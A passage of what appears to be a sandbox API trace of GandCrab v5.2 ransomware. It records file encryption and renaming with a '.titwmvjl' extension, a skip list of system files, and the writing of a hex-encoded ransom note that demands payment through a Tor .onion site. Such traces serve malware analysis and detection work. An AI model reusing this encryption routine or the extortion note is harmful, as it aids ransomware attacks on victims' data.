nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259e78c*=0x2d, lpOverlapped=0x0) returned 1 [0071.868] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffffffd3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.868] WriteFile (in: hFile=0x2d4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259e770*=0x2d, lpOverlapped=0x0) returned 1 [0071.869] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.870] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0071.872] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.876] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.876] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.876] CloseHandle (hObject=0x2d4) returned 1 [0071.877] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b.titwmvjl"), dwFlags=0x1) returned 1 [0071.878] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.878] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0071.878] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0071.878] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0071.878] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock" [0071.878] lstrlenW (lpString=".titwmvjl") returned 9 [0071.879] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock") returned 129 [0071.879] VirtualAlloc (lpAddress=0x0, dwSize=0x142, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.879] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 138 [0071.879] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock") returned 129 [0071.879] lstrlenW (lpString=".lock") returned 5 [0071.879] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.879] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0071.879] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.879] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.880] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0071.880] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0071.880] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0071.880] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt" [0071.880] lstrlenW (lpString=".titwmvjl") returned 9 [0071.880] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt") returned 125 [0071.880] VirtualAlloc (lpAddress=0x0, dwSize=0x13a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.880] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 134 [0071.880] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt") returned 125 [0071.880] lstrlenW (lpString=".txt") returned 4 [0071.880] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.880] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0071.880] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0071.880] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.881] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt") returned 125 [0071.881] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt") returned 125 [0071.881] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0071.881] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0071.881] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0071.881] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0071.881] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0071.881] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0071.881] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0071.881] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0071.881] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.881] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0071.881] FindClose (in: hFindFile=0x5033f8 | out: hFindFile=0x5033f8) returned 1 [0071.882] CloseHandle (hObject=0x2cc) returned 1 [0071.882] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0071.882] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0071.882] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0071.883] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\TITWMVJL-DECRYPT.txt" [0071.883] lstrlenW (lpString=".titwmvjl") returned 9 [0071.883] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\TITWMVJL-DECRYPT.txt") returned 79 [0071.883] VirtualAlloc (lpAddress=0x0, dwSize=0xde, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.883] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 88 [0071.883] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\TITWMVJL-DECRYPT.txt") returned 79 [0071.883] lstrlenW (lpString=".txt") returned 4 [0071.883] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.883] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0071.883] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0071.883] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.883] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\TITWMVJL-DECRYPT.txt") returned 79 [0071.883] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\TITWMVJL-DECRYPT.txt") returned 79 [0071.883] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0071.883] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0071.883] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0071.883] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0071.884] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0071.884] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0071.884] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0071.884] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0071.884] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.884] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0071.884] FindClose (in: hFindFile=0x5036f8 | out: hFindFile=0x5036f8) returned 1 [0071.884] CloseHandle (hObject=0x2c4) returned 1 [0071.885] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0071.885] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0071.885] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0071.885] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\TITWMVJL-DECRYPT.txt" [0071.885] lstrlenW (lpString=".titwmvjl") returned 9 [0071.885] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\TITWMVJL-DECRYPT.txt") returned 75 [0071.885] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.885] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 84 [0071.885] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\TITWMVJL-DECRYPT.txt") returned 75 [0071.885] lstrlenW (lpString=".txt") returned 4 [0071.885] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.885] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0071.885] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0071.885] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.885] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\TITWMVJL-DECRYPT.txt") returned 75 [0071.885] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\TITWMVJL-DECRYPT.txt") returned 75 [0071.885] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0071.886] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0071.886] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0071.886] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0071.886] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0071.886] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0071.886] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0071.886] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0071.886] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.886] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0071.886] FindClose (in: hFindFile=0x5033b8 | out: hFindFile=0x5033b8) returned 1 [0071.887] CloseHandle (hObject=0x2bc) returned 1 [0071.887] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0071.887] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0071.887] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0071.887] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\d2ca4a09d2ca4deb61a.lock" [0071.887] lstrlenW (lpString=".titwmvjl") returned 9 [0071.887] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\d2ca4a09d2ca4deb61a.lock") returned 72 [0071.887] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.887] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 81 [0071.887] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\d2ca4a09d2ca4deb61a.lock") returned 72 [0071.887] lstrlenW (lpString=".lock") returned 5 [0071.888] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.888] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0071.888] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.888] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.888] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0071.888] lstrcmpW (lpString1="Document Building Blocks", lpString2=".") returned 1 [0071.888] lstrcmpW (lpString1="Document Building Blocks", lpString2="..") returned 1 [0071.888] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Document Building Blocks" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks" [0071.888] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\" [0071.888] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0071.889] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.889] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0071.889] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.889] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0071.889] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.889] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0071.889] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.889] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0071.889] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.889] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.890] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\\\TITWMVJL-DECRYPT.txt") returned 94 [0071.890] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\document building blocks\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0071.890] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x